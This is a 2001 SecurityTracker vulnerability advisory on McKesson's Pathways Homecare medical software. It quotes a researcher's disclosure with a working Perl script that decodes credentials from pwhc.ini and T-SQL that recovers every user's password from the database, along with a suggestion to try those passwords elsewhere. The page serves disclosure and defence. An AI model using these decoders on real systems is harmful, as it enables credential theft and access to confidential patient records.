SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Pathways Homecare Vendors:   McKesson
McKesson's Pathways Homecare Medical Application Discloses Passwords to Local Users
SecurityTracker Alert ID:  1002929
SecurityTracker URL:  http://securitytracker.com/id/1002929
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 9 2001
Impact:   Disclosure of authentication information, User access via local system
Exploit Included:  Yes  
Version(s): 6.5
Description:   A vulnerability has been reportede in McKesson's Pathways Homecare medical application. A local user can obtain the access passwords for all users on the system.

It is reported that Pathways Homecare uses a weak password encoding scheme that can be decoded by local users to obtain the 'sa' SQL Server account password as well as application passwords for all users of the application.

With this password information, a user can obtain patient information, billing information and medical records.

It is reported that the file pwhc.ini contains an encoded username and password.

It is reported that the username and password is encoded by subtracting a certain number from each byte of the reverse-ordered username/password string. If the length of the username/password information is odd, the following sequence of numbers is apparently used: 3, 8, 5, 10, 7, [...]. If the length is even, the sequence is apparently 7, 4, 9, 6, 11, [...].

A user can also apply the same encoding scheme with a different sequence of numbers to decode the username and password for every user of the system.

Demonstration exploit code is provided in the Source Message.

The vendor has reportedly been notified.

Impact:   A local user can decode a password to gain access to the system. A user can also decode the passwords for all users of the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mckesson.com (Links to External Site)
Cause:   Access control error
Underlying OS:   Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Date:  Fri, 7 Dec 2001 16:54:24 +0000 (GMT)
Subject:  Weak Encryption Vulnerability in Pathways Homecare


Platforms: Windows 95
           Windows 98
           Windows ME
           Windows 2000

Application: Pathways Homecare 6.5

What's the big deal?  Users with access to certain config files can
retrieve 'sa' or equivalent account password for SQL Server 7.0 (MSDE)
as well as retrieve application passwords for all users of the
application.

The full scoop:

According to the vendor, McKesson's Pathways Homecare is the first
comprehensive client/server application introduced to the homecare market
for advanced information management.

Basically is stores patient information, billing information and medical
records for people who recieve health care in their homes.  Each clinician
has a laptop and all the laptops are periodically synced with a central
database.  Additionally there is a desktop client for administrative
staff.  Both the laptops and the central database server run Microsoft SQL
Server 7.0.

Workstation and laptop users alike get their connection information from a
file named pwhc.ini which contains an encrypted username and password.
For workstations, the file is stored on a central fileserver and the
account is likely to have dbo level permissions on the central database.
For the laptops, this file is stored locally and the account used is
either 'sa' on the local version of SQL or has equivalent permissions.

As you've probably guessed by now, the vendor (on the web at
www.mckesson.com ) decided to be clever and roll their own encryption
algorithm:

First they determine whether the username/password is even or odd
in length.
If odd, they use the following sequence of numbers: 3,8,5,10,7...
If even, the sequence is 7,4,9,6,11...
Then they reverse the username/password and subtract the corresponding
number in the sequence from each byte.

That wasn't the best of explanations, so here's a bit of perl:

#! /usr/bin/perl -w

################################################################################
# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini
file
################################################################################

use strict;

open (PWHC, "pwhc.ini") or die "Unable to open .ini file";
while (<PWHC>) {
   chomp;
   if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
   if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
}

################################################################################
# The sad thing is that this isn't the worst part of product.  It's not
# that the vendor is using weak encryption, it's that the quality of
# the encryption is better than most of their code.
################################################################################


sub decrypt {
   my $counter = 0;
   my $key;
   my @cryptstr = split /=/, $_, 2;
   my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
   if(@revstr % 2) {
      $key = 3;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? 5 : -3;
      }
   }
   else {
      $key = 7;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? -3 : 5;
      }
   }
   return pack("c*", (reverse @revstr));
}

__END__


So now anyone who can get access to the config files for Pathways Homecare
can read and modify confidential patient information as well as enjoy sa
priviliges on laptop clients, but they still can't use McKesson's
usability
disaster of a VB client to access that data in a less inconvienent manner
because it's protected by an an additional level of password protection.

Unfortunately the vendor uses the exact same encryption method with
slightly
different key sequences for this additional layer of security.  It's
possible to retrieve the username and password for every user in about 2
seconds.  The T-SQL code to do this follows:

SET NOCOUNT ON
DECLARE @evenkey varchar(15)
DECLARE @oddkey varchar(15)
DECLARE @key varchar(15)
DECLARE @cryptstr varchar(15)
DECLARE @position tinyint
DECLARE @length tinyint
DECLARE @usrid varchar(30)

DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
OPEN pwd_cursor
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
SET @evenkey = 'FDHFJHLJNLPNRP'
SET @oddkey = 'CGEIGKIMKOMQOSQ'

WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @position = 1
SET @length = datalength(@cryptstr)
IF ((@length % 2) = 1) SET @key = @oddkey
ELSE SET @key = @evenkey

WHILE (@position <= @length)
BEGIN
   SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
       CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
       + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
   SET @position = @position + 1
END
PRINT @usrID + ' : ' + @cryptstr
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
END
DEALLOCATE pwd_cursor
GO


Bang!  Out come the passwords and it's time to see if the user uses the
same password elsewhere.

I contacted the security-alert@mckesson.com 2 weeks ago.  I recieved an
immediate response telling me that my message had been forwarded to the
appropriate parties within the Pathways Homecare product group and that
was the last of it.

Anyway, the best way to mitigate the security vulnerabilities disclosed
here is to not use the product.  Failing that, you should use
integrated security to connect to SQL Server (meaning you can't run
Windows 9x/ME on the laptops, but you shouldn't be doing that anyway).

--Shoeboy
Software is like sex, it's better when RMS isn't involved.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC